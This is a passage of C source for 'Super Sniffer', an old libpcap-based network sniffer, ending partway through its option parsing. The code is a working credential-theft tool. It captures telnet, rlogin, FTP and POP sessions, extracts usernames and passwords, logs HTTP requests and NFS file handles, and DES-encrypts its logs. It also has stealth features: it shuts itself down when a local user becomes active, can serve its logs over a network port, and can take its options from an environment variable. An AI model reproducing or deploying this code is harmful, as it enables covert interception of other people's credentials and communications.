/*
 * Super Sniffer v1.40    (http://www.mobis.com/ajax/projects)
 *
 * (c) 1996-1999 ajax (ajax@mobis.com), firebug (chuck@innet.com)
 * Portions written by The Crawler.
 * GNU Regex portions (-k flag) shamlessly stolen from ngrep, sorry nocarrier
 *
 * esniff.c rewritten to use libpcap and with extra options.
 *   Note: esniff.c had a serious bug in ADD_NODE which caused
 *      it to lose records of open network connections.
 *      This has been fixed in Super Sniffer.
 *
 * Will sniff on Linux, IRIX, SunOS 4.x, Solaris 2.x, BSD/386, DEC/OSF,
 *   Digital UNIX, Ultrix 4.x, 4.x BSD, NetBSD, FreeBSD, BSDI, and HP-UX.
 *
 * Notable Missing: AIX.
 * 
 */
/* #define DEBUG          debugging */
/* #define DONT_DISPLAY_USAGE      Do we want a usage/help screen? */


#include <sys/types.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/param.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#ifdef SOLARIS
#include <sys/sockio.h>
#endif
#include <net/if.h>

#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_var.h>
#include <netinet/udp.h>
#include <netinet/udp_var.h>
#include <netinet/tcp.h>
#include <netinet/tcpip.h>

#include <netdb.h>
#include <arpa/inet.h>

#include <rpc/rpc.h>

#include <signal.h>
#include <stdio.h>
#include <search.h>        /* for hash table routines */
#ifdef __STDC__
#include <stdlib.h>
#endif
#include <stdarg.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <ctype.h>
#include <utmp.h>
#include <pwd.h>

#include "regex.h"
#include <pcap.h>

#ifdef CRYPT
#include "deslib/des.h"
#endif

/* 
 * Function prototypes 
 */
void ether_filter    (u_char *, const struct pcap_pkthdr *, const u_char *);
void ppp_filter      (u_char *, const struct pcap_pkthdr *, const u_char *);
void raw_filter      (u_char *, const struct pcap_pkthdr *, const u_char *);
void slip_filter     (u_char *, const struct pcap_pkthdr *, const u_char *);
void loopback_filter (u_char *, const struct pcap_pkthdr *, const u_char *);
void usage           (char *argv);
int bind_socket(pid_t parent_pid, int listen_port); 
int drop_promisc (char *dev, int pcap_fd);
static void cleanup(char *msg);
static void sig_alrm(int signo);
static void sig_handler(int signo);
static void sighup_pausesniffing(int signo);
static void sighup_startsniffing(int signo);


/*
 * Solaris 2.4 and earlier do not have bcopy, bzero and bcmp.
 */
#ifdef NO_BCOPY
#define bcopy(s, d, n)    memcpy(d, s, n)
#define bzero(s, n)       memset(s, 0, n)
#define bcmp(s1, s2, n)   memcmp(s1, s2, n)
#endif

#define ZERO(s) memset((s), 0, sizeof(s))

/* BUG FIX in libpcap */
int fddipad = 0;

/*
 * Miscellaneous defines.
 */
#undef MIN
#define MIN(a,b)        (((a)<(b)) ? (a) : (b))
#define ALARM_SECS      10
#define IDLE_TIMEOUT    1800
#define SNAPLEN         65535
#define PPP_HDRLEN      4
#define SLIP_HDRLEN     16
#define NUM_SAVED_FHS   200            

#define FILTER_STR "tcp dst port 23 or 513 or 21 or 110"

/*
 * Try to define UTMP_FILE from the standard include files.
 * However, if none is defined then revert to the default.
 */
#ifndef UTMP_FILE
#ifdef _PATH_UTMP
#define UTMP_FILE   _PATH_UTMP
#else
#define UTMP_FILE   "/var/adm/utmp"
#endif
#endif

/*
 * Global Variables.
 */
struct node {
   struct   node *next, *last;               /* Pointer to next node */
   time_t   time;                            /* Start Time */
   struct   in_addr srcip, dstip;            /* src and dst IP addresses */
   u_int    srcport, dstport;                /* src and dst ports */
   u_char   *data;                           /* Captured data */
   u_int    ofs;                             /* Current data ofs */
/*   u_long  last_seq;                       /* seq# of last segment seen */
} *rootnode = NULL;

int     ut_fd;                             /* UTMP file descriptor */
int     sighup_toggle = 0;                 /* pause/start sniffing toggle */
time_t  starttime;                         /* Starting time */
char    filehandles[NUM_SAVED_FHS][32];    /* Saved file handles */
char    *ss_args = NULL;               /* copy of argv[0] */
int     fhptr = 0;                         /* Pointer */
int     cflag = 1;                         /* Crypt flag */
int     fflag = 0;                         /* Foreground flag */
int     nflag = 0;                         /* NFS file handle sniffing */
int     pflag = 0;                         /* Paranoid flag */
int     hflag = 0;                         /* usage flag */
int     uflag = 0;                         /* filter string (optional) */
int     oflag = 0;                         /* output file flag */
int     tflag = 0;                         /* no telnet negotiation kludge */
int     kflag = 0;                         /* keyword parsing flag */
int     lflag = 0;                         /* dump logs to port flag */
int     mflag = 0;                         /* max matches */
int     rflag = 0;                         /* do not resolve IPs */
int     yflag = 0;                         /* udp source port flag*/
int     verbose = 0;                       /* verbose flag */
int     quiet = 0;                         /* quiet mode */
int     dont_log_dupes = 0;                /* -x dont log dupes */
FILE    *outfile;                          /* output file handle */
char    *filename = NULL;                  /* outfile to fopen */
u_long  datalen = 2048;                    /* Captured data length */
char    *SearchString = NULL;              /* search string for logging */
int     listen_port = 0;                   /* port to listen on (-l flag) */
int     udp_srcport = 0;                   /* UDP source port to answer 
                                            * connections on (-y flag) */
char    dbg[] = "[debug]";
char *device = NULL;
pcap_t *pcap_device;


/* regex variables */
#define WORD_REGEX "((^%s\\W)|(\\W%s$)|(\\W%s\\W))"
int re_match_word = 0, re_ignore_case = 0;
struct re_pattern_buffer pattern;
char *regex, *filter, *re_err;
int matches = 0, max_matches = 0;
int match_after = 0, keep_matching = 0;

/*
 * hash table variables - used for dont_log_dupes (-x flag) 
 */
#define HASHTABLE_USERS 5000
char string_space[HASHTABLE_USERS*30]; /*space to store strings*/
char info_space[HASHTABLE_USERS];
char *key_ptr = string_space; /* next available string_space */
char *value_ptr = info_space;
ENTRY item, *found_item;
char name_to_find[8];  /* name to look for in table */


#ifdef CRYPT
des_cblock key, ivec;
des_key_schedule ks;
#endif


#ifdef CRYPT
/*
 * Prompt for pass phrase and setup DES key and initialization vectors.
 */
void encryption_setup() {
   char keystr[160];

   /*
    * Prompt user for pass phrases.
    */
   fprintf(stderr, "Pass phrase: ");
   fgets(keystr, sizeof(keystr), stdin);

   des_string_to_2keys(keystr, &key, &ivec);
   des_set_key(&key, ks);

   ZERO(keystr);
}


/*
 * Encrypt data and pass to stdout, just like printf.
 */
void
eprintf(const char *format, ... )
{
   va_list ap;
   char str[256], out[256];
   register int length, i;
   static int num = 0;   
      
   va_start(ap, format);

   /*
    * If encryption not on then just printf to outfile and return.
    * outfile was previously set to either stdout (-f flag) or (-o flag)
    * If -o flag is not present, outfile = stdout 
    */
   if (!cflag) {
      vfprintf(outfile, format, ap); 
      return;
   }

   /*
    * Write text to string.
    */
   vsprintf(str, format, ap);
   length = strlen(str);
   
   /*
    * Encrypt and output to stdout.
    */
   des_cfb64_encrypt(str, out, length, ks, &ivec, &num, DES_ENCRYPT);
   for (i=0; i<length; i++) {
      putc(out[i], outfile);
   }

   va_end(ap);
}
#else
/*
 * No encryption, just pass to printf.
 */
void
eprintf(const char *format, ... )
{
   va_list ap;
   
   va_start(ap, format);
   vprintf(format, ap);
   va_end(ap);
}
#endif

void
usage(char *argv0)
{
#ifndef DONT_USE_USAGE
    printf ("usage: %s [options]\n",argv0);
    printf ("options:\n");
    printf ("  -h        display usage          -d <interface> listen on interface\n");
    printf ("  -f        foreground mode        -c             turn off DES encryption\n");
    printf ("  -n        sniff NFS filehandles  -s <size>      capture buffer size\n");
    printf ("  -p        Paranoid mode          -w <username>  setuid to username\n");
    printf ("  -o <file> output log filename    -k 'pattern'   regex pattern match\n");
    printf ("  -l <port> dump logs to port      -u 'filter'    pass filter string to libpcap\n");
    printf ("  -y <port> use UDP w/src port     -t             no telnet negotiation kludge\n");
    printf ("  -m <nnn>  max regex matches      -q             quiet mode\n");
    printf ("  -v        verbose mode           -r             disable IP->name resolution\n"); 
    printf ("  -i        ignore case (regex)    -x             Exclude duplicate POP/FTP\n");
    printf ("example: %s -cvfxo /tmp/log\n",argv0);
    printf ("         %s -i eth0 -o /tmp/log -u 'tcp dst port 21' -k '(user|pass)'\n\n\n\n",argv0);
    printf ("NOTE: libpcap filter defaults to: tcp dst port 23 or 513 or 21 or 110\n");
    printf ("NOTE: If environment variable SSARGS exists, options are taken from\n");
    printf ("      here. If it exists but is null, options are taken from the command\n");
    printf ("      line. Command line parameters are ignored if this variable is set.\n");
    printf ("NOTE: If -y is specified, port listener will only respond if UDP source port\n");
    printf ("      is equal to <port>, at which point logs will be dumped to the socket.\n");
    printf ("      HTTP and DNS requests are printed on one line unless -v (verbose mode) is on.\n");
#endif
    exit(0);
}
/*
 * Setup paranoid mode by opening utmp file.
 */
void
paranoid_setup()
{
   /*
    * Open the UTMP file.
    */
   if ( (ut_fd = open(UTMP_FILE, O_RDONLY)) < 0 ) {
      fprintf(stderr, "ERROR: Opening UTMP for paranoid mode.\n");
      exit(1);
   }

   /*
    * Record starting time.
    */
   time(&starttime);
}


/*
 * Check users tty's to see if they are active.
 */
void
paranoid_check()
{
   struct utmp   ut;
   struct stat   sbuf;
   char      ttyn[50];
   
   
   lseek(ut_fd, 0, SEEK_SET);
   
   while ( read(ut_fd, &ut, sizeof(ut)) > 0) {
      /*
       * Get stats of the user's tty.
       */
      strcpy(ttyn, "/dev/");
      strcat(ttyn, ut.ut_line);
      if ( stat(ttyn, &sbuf) < 0)
         continue;
         
      /*
       * If access time is newer than start time
       * then abort process and cleanup.
       */
      if (sbuf.st_atime > starttime) 
         cleanup("PARANOID");
   }
}


struct filter {
   pcap_handler f;
   int type;
};

static struct filter filters[] = {
   { ether_filter,      DLT_EN10MB },
   { ppp_filter,      DLT_PPP },
   { slip_filter,       DLT_SLIP },
/*   { loopback_filter,   DLT_LOOPBACK },*/
   { raw_filter,   DLT_RAW },
   { NULL,         0 },
};


/*
 * Return a pointer to the function that will take the packets.
 */
static pcap_handler
lookup_filter(int type)
{
   struct filter *p;

   for (p = filters; p->f; ++p)
      if (type == p->type)
         return p->f;

   fprintf(stderr, "ERROR: unknown data link type 0x%x\n", type);
   exit(1);
}

/*
 * Resolve hostname.
 */
char *hresolve (struct in_addr ip) {
   register struct hostent *he =
       gethostbyaddr ((char *) &ip.s_addr, sizeof (struct in_addr), AF_INET);
    
   return( he ? (char *) he->h_name : (char *) inet_ntoa(ip) );
}


/*
 * Resolve portname.
 */
char *presolve(register u_int port) { 
   static char buf[10];
   register struct servent *se = getservbyport(htons(port), "tcp");

   if (!se) {
      sprintf(buf, "%u", port);
      return (buf);
   } else 
      return(se->s_name);
}


/*
 * Output connection log.
 */
void PRINT_DATA(u_char *p, int length, u_int srcport, u_int dstport) {
   int i;
   
   for (i=0; i<length; i++, p++) {
      /*
       * Check control characters.
       */
      if (*p < 32) {
         switch (*p) {
            case '\0': break;
            case '\r':
            case '\n': eprintf("\n  "); break;
            default:   eprintf("^%c", (*p + 64)); break;   
         }
      }
      else {
         if ( isprint(*p) ) 
            eprintf("%c", *p);
         else {
            /*
            ** Inside a telnet connection, dont print characters above
            ** 240 ascii (telnet negotiation characters), unless specified
            ** by the -t (no telnet kludge) option.
            */
            if ((dstport == 23) || (srcport == 23)) {
               if (*p < 240) {
                  eprintf("%c", *p); 
               } else {
                  if (tflag) { eprintf("(%d)", *p); }
               } 
            } else {
               eprintf("(%d)", *p);  
            }
          }
      }
   }
}


/*
 * Print node information and free node's memory.
 */
void END_NODE(struct node *deadnode, u_char *p, int length, char *msg) {
   char *timestr;
   int  count;
   struct tcphdr *tcp;
   tcp = (struct tcphdr *) p;

   /*
    * Convert time value to readable string.
    */
   if(length+deadnode->ofs == 0) goto skip; /* no data */

   /*
   ** regex parsing routine
   **
   */

   // if(deadnode->dstport == 25)
   if(regex)
   {
      char buf[datalen];

      memcpy(buf, deadnode->data, deadnode->ofs>datalen?datalen:deadnode->ofs);
      /* protect buf from overflowing */
      buf[deadnode->ofs>(datalen-1)?(datalen-1):deadnode->ofs] = 0;
      /* If we dont match the regex pattern, skip */
      if(!match(&pattern,deadnode->data,datalen)) goto skip;

   }
//ajax
   if ( (deadnode->dstport==80) && (!verbose) ) {
      char *p;
      char *get_data;
      int get_recieved, post_recieved;
      char *post_data;
      char buf[datalen];

      memcpy(buf, deadnode->data, deadnode->ofs>datalen?datalen:deadnode->ofs);
      buf[deadnode->ofs>(datalen-1)?(datalen-1):deadnode->ofs] = 0;
      printf("hello\n");
         
      p = strtok(buf, " \r\n");
      for(;;) {
         if(p==NULL || !strcasecmp(p, "GET")) break;
         p = strtok(NULL, " \r\n");
      }
      if(!p || !(get_data=strtok(NULL, "\r\n")) ) { 
        get_recieved=0;
      } else {
        get_recieved=1;
      }
      for(;;) {
         p = strtok(NULL, " \r\n");
         if(p==NULL || !strcasecmp(p, "POST")) break;
      }
      if(!p || !(post_data=strtok(NULL, "\r\n")) ) {
        post_recieved=0;
      } else {
        post_recieved=1;
      }
      printf("post_data=%s\n",post_data);
      printf("get_data=%s\n",get_data);
      if (get_recieved) {
         timestr = ctime(&deadnode->time);
         timestr[strlen(timestr)-1]=0;         /* strip "\n" */
         eprintf("%s: %s %s => ", "HTTP",
           timestr,rflag?(char *) inet_ntoa((struct in_addr)deadnode->srcip)
           :hresolve(deadnode->srcip));
         eprintf("%s GET %s\n",
           rflag?(char *) inet_ntoa((struct in_addr)deadnode->dstip)
           :hresolve(deadnode->dstip), get_data);

      }
      if (post_recieved) {
         timestr = ctime(&deadnode->time);
         timestr[strlen(timestr)-1]=0;         /* strip "\n" */
         eprintf("%s: %s %s => ", "HTTP",
           timestr,rflag?(char *) inet_ntoa((struct in_addr)deadnode->srcip)
           :hresolve(deadnode->srcip));
         eprintf("%s POST %s\n",
           rflag?(char *) inet_ntoa((struct in_addr)deadnode->dstip)
           :hresolve(deadnode->dstip), post_data);

      }
      goto skip;
   }

   /*
    * Handle POP and FTP by parsing the USER and PASS commands. 
    */
   if(deadnode->dstport==21 || deadnode->dstport==110) /* ftp, pop */
   {
      char *p;
      char *user;
      char *pass;
      char buf[datalen];
      
      memcpy(buf, deadnode->data, deadnode->ofs>datalen?datalen:deadnode->ofs);
      buf[deadnode->ofs>(datalen-1)?(datalen-1):deadnode->ofs] = 0;
      p = strtok(buf, " \r\n");
      for(;;) {
         if(p==NULL || !strcasecmp(p, "USER")) break;
         p = strtok(NULL, " \r\n");
      }
      if(!p || !(user=strtok(NULL, "\r\n")) ) goto skip;
      for(;;) {
         p = strtok(NULL, " \r\n");
         if(p==NULL || !strcasecmp(p, "PASS")) break;
      }      
      if(!p || !(pass=strtok(NULL, "\r\n")) ) goto skip;
      /*
       * Here we want to take a look at deadnode->dstip, user and pass
       * and compare it to a hash table of values.  If it is found
       * in our hash, do not log it.  Only do this if the dont_log_dupes
       * flag is present
       */
      if (dont_log_dupes) {
         int foo = 0;
         // char *tmpdata[]={pass, deadnode->dstip };
         // tmpinfo_ptr = pass, deadnode->dstip;
#ifdef SOLARIS
         sprintf(name_to_find,user);
#else
         snprintf(name_to_find,8,user); 
#endif

         item.key = name_to_find;
         if ((found_item = hsearch(item, FIND)) != NULL)  {
            /*
             * username was found in the table 
             * check to see if the password is the same as
             * what we got.  If it is, goto skip, otherwise
             * log this.
             */
#ifdef DEBUG
               fprintf(stderr,"debug: We found a match in table.\n");
               fprintf(stderr,"debug: item.key=%s\n", item.key);
               fprintf(stderr,"debug: item.data=%s\n", item.data);
               fprintf(stderr,"debug: found_item=%s\n", found_item);
               fprintf(stderr,"debug: found_item->key=%s\n", found_item->key);
               fprintf(stderr,"debug: found_item->data=%s\n", found_item->data);
#endif
            if (!strcmp(found_item->data, pass)) {
               goto skip;
            }
         }
            /* we did not find a match in the table,
             * so insert this entry into table
             */ 
            //item.key = key_ptr;
            item.data = (char *)pass;
            item.key = name_to_find;
            key_ptr += strlen(key_ptr) + 1;
            value_ptr = (char *)pass;
            value_ptr++;
            (void) hsearch(item, ENTER);  
#ifdef DEBUG
               fprintf(stderr,"debug: we did not find a match in table\n.");
               fprintf(stderr,"item.key=%s, item.data=%s, value_ptr=%s\n",item.key, item.data, value_ptr);
#endif
      }      
      if (!verbose) {       
        eprintf("%s: %s => ", deadnode->dstport==21?"FTP":"POP", 
           rflag?(char *) inet_ntoa((struct in_addr)deadnode->srcip)
           :hresolve(deadnode->srcip));
      } else {
        timestr = ctime(&deadnode->time);
        timestr[strlen(timestr)-1]=0;         /* strip "\n" */
        eprintf("%s: %s %s => ", deadnode->dstport==21?"FTP":"POP",
           timestr,rflag?(char *) inet_ntoa((struct in_addr)deadnode->srcip)
           :hresolve(deadnode->srcip));
      }
      eprintf("%s %s:%s\n", 
         rflag?(char *) inet_ntoa((struct in_addr)deadnode->dstip)
        :hresolve(deadnode->dstip), user, pass);

      goto skip;   
invalid:
#ifndef LOG_INVALID_POP_AND_FTP
       goto skip;
#endif
   }

   timestr = ctime(&deadnode->time);
   timestr[strlen(timestr)-1]=0;         /* strip "\n" */

   if (verbose) {
      timestr = ctime(&deadnode->time);
      timestr[strlen(timestr)-1]=0;         /* strip "\n" */
      eprintf("-- TCP/IP LOG -- TM: %s", timestr);
   }
   eprintf("\n%s:%s > ",
           rflag?(char *) inet_ntoa((struct in_addr)deadnode->dstip)
                :hresolve(deadnode->srcip), 
                      presolve(deadnode->srcport));
   eprintf("%s:%s [%s]",
           rflag?(char *) inet_ntoa((struct in_addr)deadnode->dstip)
                :hresolve(deadnode->dstip),
           presolve(deadnode->dstport),
           msg);
        eprintf(" [%s%s%s%s%s%s]\n",
               (tcp->th_flags&TH_ACK)?"A":"",
               (tcp->th_flags&TH_SYN)?"S":"",
               (tcp->th_flags&TH_RST)?"R":"",
               (tcp->th_flags&TH_FIN)?"F":"",
               (tcp->th_flags&TH_URG)?"U":"",
               (tcp->th_flags&TH_PUSH)?"P":"");


   eprintf("  ");
   
   PRINT_DATA(deadnode->data, deadnode->ofs, deadnode->srcport, deadnode->dstport);
   PRINT_DATA(p, length, deadnode->srcport, deadnode->dstport);   

   if (verbose) eprintf("\n--\n");
   
skip:
   fflush(outfile);

   /*
    * Free up node's memory.
    */
   if (deadnode->next != NULL)
      deadnode->next->last = deadnode->last;
   if (deadnode->last != NULL)
      deadnode->last->next = deadnode->next;
   else
      rootnode = deadnode->next;
   free(deadnode->data);
   free(deadnode);

  if (match_after && keep_matching)
    keep_matching--;

}


/*
 * End connections if they are idleing.
 */
void
IDLE_NODES() {
   struct node   *endnode, *loopnode;
   time_t        nowtime;
   
   time(&nowtime);
   loopnode = rootnode;
   while ( (endnode = loopnode) ) {
      loopnode = endnode->next;
      if (endnode->time + IDLE_TIMEOUT < nowtime)
         END_NODE(endnode, (u_char *) NULL, 0, "IDLE TIMEOUT");
   }   
}


/*
 * Find the node and return a pointer to it.
 */
struct node *
GET_NODE(struct in_addr ip_src, u_int th_sport,
      struct in_addr ip_dst, u_int th_dport)
{
   struct node *lnode;      /* loop node */
   
   for (lnode = rootnode ; lnode != NULL ; lnode = lnode->next)
      if ( (lnode->srcip.s_addr == ip_src.s_addr) 
            && (lnode->srcport == th_sport)
            && (lnode->dstip.s_addr == ip_dst.s_addr)
            && (lnode->dstport == th_dport) ) 
         break;
   
   return(lnode);
}

void icmp_filter(struct ip *ip, const u_char *p, int length) {
}

/*
 * All TCP packets are passed here.
 */
void
tcp_filter(struct ip *ip, const u_char *p, int length)
{
   struct tcphdr *tcp;
   struct node *tmpnode;
   u_int sport, dport;

   /*
    * Point TCP header at packet.
    */
   tcp = (struct tcphdr *) p;

   sport = ntohs(tcp->th_sport);
   dport = ntohs(tcp->th_dport);

   /*
    * Skip TCP header
    */
   p += tcp->th_off * 4;
   length -= tcp->th_off * 4;

   /*
    * Try to find node in current list.
    */
   if ( (tmpnode = GET_NODE(ip->ip_src, sport, ip->ip_dst, dport)) ) {
      if (length > 0) {
/*         if(tcp->th_seq==tmpnode->last_seq) return;
         tmpnode->last_seq=tcp->th_seq; */
         if ( (tmpnode->ofs + length) < datalen ) {
            /*
             * Save data in node.
             */
            bcopy(p, &tmpnode->data[tmpnode->ofs], length);
            tmpnode->ofs += length;
         }
         else
            END_NODE( tmpnode, (u_char *) p, length, 
                     "DATA LIMIT");
      }
            
      if ( (tcp->th_flags & (TH_FIN | TH_RST)) ) 
         END_NODE( tmpnode, (u_char *) p, length, "RESET");
         
   } else if ( (tcp->th_flags & TH_SYN) ) {
      /*
       * Add a new node to the list.
       */
      tmpnode = (struct node *) malloc (sizeof(struct node));
      time( &(tmpnode->time) );
      tmpnode->srcip.s_addr = ip->ip_src.s_addr;
      tmpnode->dstip.s_addr = ip->ip_dst.s_addr;
      tmpnode->srcport = sport;
      tmpnode->dstport = dport;
      tmpnode->ofs = MIN(length, datalen); 
      tmpnode->data = (u_char *) malloc (datalen);
/*      tmpnode->last_seq = tcp->th_seq; */
      bcopy ( p, tmpnode->data, tmpnode->ofs );
      tmpnode->next = rootnode;
      if (rootnode != NULL)
         rootnode->last = tmpnode;
      tmpnode->last = NULL;
      rootnode = tmpnode;
      /* free(tmpnode);   fixed_memory_leakz */   
   }
}


/*
 * Print filehandle.
 */
void
PRINT_FH(char *timestr, char *server, u_char *fh)
{
   int i;

   eprintf("\n-- NFS LOG -- TM: %s -- \n", timestr );
   eprintf(" SERVER: %s\n", server );
   eprintf(" FH    : ");
   
   for (i=0; i<32; i++) {
      eprintf("%02x ", fh[i]);
      if (i == 15) 
         eprintf("\n       : ");
   }
   eprintf("\n--\n");
   
   fflush(outfile);
}


/*
 * RPC NFS requests are passed here.
 */
void 
rpcnfs_filter(struct ip *ip, struct udphdr *udp, const u_char *p, int length)
{
   struct rpc_msg *rpc;
   time_t t;
   char *timestr;
   u_long len;
   int i;

   rpc = (struct rpc_msg *) p;

   switch ( ntohl(rpc->ru.RM_cmb.cb_proc) ) {
      /* NFSPROC_READDIR */
      case 16:
         /* 
          * point p at file handle 
          */
         p += 36;
         len = ntohl( *( (u_long *) p) );
         if (len % 4)
            len += (4 - len % 4);
         len += 56;
         p += len;

         /*
          * Check to see if we have already seen this 
          *  filehandle recently
          */
         for (i=0; i<NUM_SAVED_FHS; i++)
            if (bcmp(p, filehandles[i], 32) == 0)
               break;
         
         /*
          * Save filehandle into array.
          */
         bcopy(p, filehandles[fhptr++], 32);
         if (fhptr >= NUM_SAVED_FHS)
            fhptr = 0;

         /*
          * Get a string representing the current time.
          */
         time(&t);
         timestr = ctime(&t);
         timestr[strlen(timestr)-1]=0;

         PRINT_FH(timestr, hresolve(ip->ip_dst), (u_char *) p);
         break;
   }   
}


/*
 * All UDP packets are passed here.
 */
void
udp_filter(struct ip *ip, const u_char *p, int length)
{
   struct udphdr *udp;
   u_int sport, dport;
   u_char nfsid[] = { 0x00, 0x00, 0x00, 0x00,   /* Call */
                      0x00, 0x00, 0x00, 0x02,   /* RPC v2 */
                      0x00, 0x01, 0x86, 0xa3,    /* nfs 100003 */
                      0x00, 0x00, 0x00, 0x02 };   /* nfs version 2 */

   /*
    * If -n option (NFS sniffing) not specified return.
    */
   if (!nflag)
      return;

   /*
    * Point UDP header at packet.
    */
   udp = (struct udphdr *) p;

   sport = ntohs(udp->uh_sport);
   dport = ntohs(udp->uh_dport);

   /*
    * Skip 8 byte UDP header.
    */
   length -= 8;
   p += 8;
   
   /*
    * Check for NFS RPC calls.
    */
   if ( bcmp( p+4, nfsid, 16) == 0 ) {
      rpcnfs_filter(ip, udp, p, length);
      return;
   }
}


/*
 * All IP packets are passed here.
 */
void
ip_filter(const u_char *p, int length)
{ 
   struct ip *ip;

   /*
    * Point IP header at packet.
    */
#ifdef ALIGN
   if ((int)p & (sizeof(long)-1)) {
      static u_char *buf;
      
      if (buf == 0)
         buf = (u_char *) malloc(SNAPLEN);
      bcopy((char *)p, (char *)buf, MIN(length, SNAPLEN));
      ip = (struct ip *) buf;
      p = (u_char *) buf;
      free(buf);  /* fixed_memory_leakz */
   } else
#endif   
   ip = (struct ip *) p;

   length = ntohs(ip->ip_len) - (ip->ip_hl * 4);
   p += ip->ip_hl * 4;

   switch ( ip->ip_p ) {
      /* TCP */
      case IPPROTO_TCP:
         tcp_filter(ip, p, length);
         break;
      /* UDP */
      case IPPROTO_UDP:
         udp_filter(ip, p, length);
         break;
      case IPPROTO_ICMP:
         icmp_filter(ip, p, length);
         break;
      default:
         break;
   }
}


/*
 * Raw loopback packets are passed here.
 */
void
loopback_filter(u_char *user, const struct pcap_pkthdr *h, const u_char *p)
{
   int length = h->len;
   static int count = 0;
   u_short *proto;

   /*
    * Loopback interface picks up every packet twice.
    * So we only want every second packet.
    */
   if (count) {
      count = 0;
      return;
   } else
      count++;
      
   /*
    * Skip past loopback header.
    */
   p += 12;
   proto = (u_short *) p;

   p += 2;   
   length -= 14;
   
   switch ( ntohs(*proto) ) {
      /* IP */
      case ETHERTYPE_IP :
         ip_filter((u_char *) p, length);
         break;
   }      
   
}

/*
 * Raw SLIP packets are passed here.
 */
void
slip_filter(u_char *user, const struct pcap_pkthdr *h, const u_char *p)
{
   register int length = h->len;
   
   length -= SLIP_HDRLEN;
   p += SLIP_HDRLEN;

   ip_filter((u_char *) p, length);
}


/*
 * Raw PPP packets are passed here.
 */
void
ppp_filter(u_char *user, const struct pcap_pkthdr *h, const u_char *p)
{
   int length = h->len;

   length -= PPP_HDRLEN;
   p += PPP_HDRLEN;
   
   ip_filter((u_char *) p, length);
}

/* raw ip packets are passed here */
void
raw_filter(u_char *user, const struct pcap_pkthdr *h, const u_char *p)
{
   int length = h->len;

   ip_filter((u_char *) p, length);
}

/*
 * Raw ethernet packets are passed here.
 */
void
ether_filter(u_char *user, const struct pcap_pkthdr *h, const u_char *p)
{
   struct ether_header *eth;
   int length = h->len;

   /*
    * Point ethernet header at packet.
    */
   eth = (struct ether_header *) p;

    /*
     * Check for 802.3 encapsulation and adjust if neccessary.
     */
   if ( ntohs(eth->ether_type) < 1500 ) {
      p += 8;
      length -= 8;
      eth = (struct ether_header *) p;
   }

   /* 
    * Skip past ethernet header to data 
    */
   p += sizeof(struct ether_header);
   length -= sizeof(struct ether_header);

   switch ( ntohs(eth->ether_type) ) {
      /* IP */
      case ETHERTYPE_IP :
         ip_filter(p, length);
         break;
   }
}


/*
 * Copy arg vector into a new buffer, concatenating arguments with spaces.
 */
char *
copy_argv(register char **argv)
{
   register char **p;
   register int len = 0;
   char *buf;
   char *src, *dst;

   p = argv;
   if (*p == 0)
      return 0;

   while (*p)
      len += strlen(*p++) + 1;

   buf = (char *)malloc(len);

   p = argv;
   dst = buf;
   while ((src = *p++) != NULL) {
      while ((*dst++ = *src++) != '\0')
         ;
      dst[-1] = ' ';
   }
   dst[-1] = '\0';

   return buf;
}


/*
 * Digital Unix aka DEC OSF crud.
 */
#ifdef __osf__
#include <sys/sysinfo.h>
#include <sys/proc.h>
void
abort_on_misalignment()
{
   int buf[2];
   
   buf[0] = SSIN_UACPROC;
   buf[1] = UAC_SIGBUS;
   if (setsysinfo(SSI_NVPAIRS, buf, 1, 0, 0) < 0) {
      perror("setsysinfo");
      exit(1);
   }
}
#endif


int
main(int argc, char *argv[])
{
   // pcap_t *pd;
   pcap_handler filter;
   char errbuf[PCAP_ERRBUF_SIZE];
   u_char *pcap_userdata = NULL;
   bpf_u_int32 localnet, netmask;
   struct bpf_program fcode;
   char *filter_str = NULL;
        char *uflag_filter = NULL;
   register int cnt = -1, op;
   pid_t pid;
   char *newuser=NULL;
   char *args;
   
   extern char *optarg;
   extern int   optind;

#ifdef __osf__
   abort_on_misalignment();
#endif

/* see if $SSARGS holds our args */
   if((args=getenv("SSARGS"))!=NULL)
   {
      char *p;
      char *argv0;
      int inquote=0;

/* we have to prompt for args if $SSARGS is empty */
      if(*args==0)
      {
         static char buf[4096];
         fprintf(stderr, "?: ");
         fgets(buf, sizeof(buf), stdin);
         args=buf;
      }

/* save old argv[0], make a new argv for getopt to use */
      argv0=argv[0]; 
      argv=malloc(256*sizeof(char *));
      argv[0]=argv0;

/* parse the argument list */      
      for(argv[argc++]=p=args; *p;)
      {
         if(*p=='"' && !inquote ) {inquote=1; argv[argc-1]=++p; } 
         if(*p=='"' && inquote ) {inquote=0; *p=' '; } 
         
         if(!inquote && *p==' ')
         {
            *p=0;   /* ends the last argv */
            while(isspace(*++p)); /* kill duplicate spaces */
            if(*p) argv[argc++]=p; /* another arg */
         } else p++;
      }
      argv[argc]=NULL;
        /* setenv("SSARGS");  to hide it from ps */

      {int i; for(i=0;i<argc;i++)printf("%d:%s\n", i, argv[i]);} /* debug */
   }

   /* store argv[0] in a seperate variable */
   ss_args = copy_argv(&argv[0]);

   if (!quiet)
      fprintf (stderr,"SuperSniffer v1.4 (c) 1994-99 Ajax, Firebug, The Crawler\n");
 
   /*
    * Scan command line options.
    */
   while ( (op = getopt(argc, argv, "cd:fhik:l:m:no:pqrs:tu:w:vxy:")) != EOF ) {
      switch (op) {
         case 'h': ++hflag;
                   usage(argv[0]);
                   break;                                     /* usage flag */
         case 'd': device=optarg;
                   break;                                    /* device flag */
#ifdef CRYPT
         case 'c': cflag=0;                  /* flag to turn encryption off */
                   if (!quiet) 
                     fprintf(stderr,"[%s]: Encryption turned off.\n",argv[0]);
                   break; 
#endif
         case 'f': ++fflag;
                   if (!quiet) {
                      fprintf(stderr, "[%s]: Foreground sniffing mode.\n",
                              argv[0]);
                   }
                   break;                        /* foreground sniffing flag */
         case 'i': ++re_ignore_case;break;    /* ignore case (regex pattern) */
         case 'l': ++lflag; listen_port=atoi(optarg);break; /* remote logging*/
         case 'o': ++oflag;
                   filename = optarg;   /* filename of file to fopen */
                                        /* used by SIGHUP handlers   */
                   if ((outfile = fopen(optarg, "w")) == NULL) {
                      if (!quiet) {
                         fprintf(stderr,
                                 "[%s]: error opening %s, using stdout\n",
                                 argv[0], optarg);
                      }
                      outfile = stdout;
                   } else {
                      if (!quiet) {
                         fprintf(stderr,"[%s]: Using output file: %s\n",
                                 argv[0],optarg);
